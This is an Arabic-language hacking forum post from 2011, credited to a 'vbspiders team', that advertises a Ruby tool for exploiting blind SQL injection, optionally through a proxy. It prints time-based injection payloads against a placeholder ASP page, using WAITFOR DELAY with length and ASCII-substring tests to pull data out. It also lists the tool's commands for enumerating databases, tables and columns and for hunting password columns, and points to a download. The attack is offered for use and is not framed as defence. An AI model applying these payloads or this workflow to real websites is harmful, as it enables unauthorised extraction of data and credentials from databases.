عرض مشاركة واحدة
قديم 12-17-2011, 11:18 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
bleu moon
 
الصورة الرمزية bleu moon
 

 

 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road

Smile Tools : Blind SQL Injection ...


السلام عليكم ...

خلاصة ! :

~ اداه بسيطه مبرمجه بالروبي ... بتقدر تستغل بها تغرات البلاند سيكول ...



فيك كمان تستغلها مع استعمال البروكسي ... الخ
يعني الاداه مميزه

وبصراحه good luck ...

طريقة استعمال الاداه ...

كود PHP:
1work out the length of the data
http://www.site.com/page.asp?id=1; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'-- 
2Extract data
http://www.site.com/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))>97) 
rinse repeat
get_databases == enum databases
get_tables == enum tables in current db
get_tables_from_db:passdb == get table names from database passdb
get_columns:table1 == enum the columns for table1
huntvalue:secret == find column with data "secret" within it and return locationneeds long time delay
huntcolumn:pass == find tables with a col with pass in the name 
Download



@vbspiders team



Tools : Blind SQL Injection >>>


التعديل الأخير تم بواسطة Cyber Code ; 10-14-2012 الساعة 10:32 AM.

   

رد مع اقتباس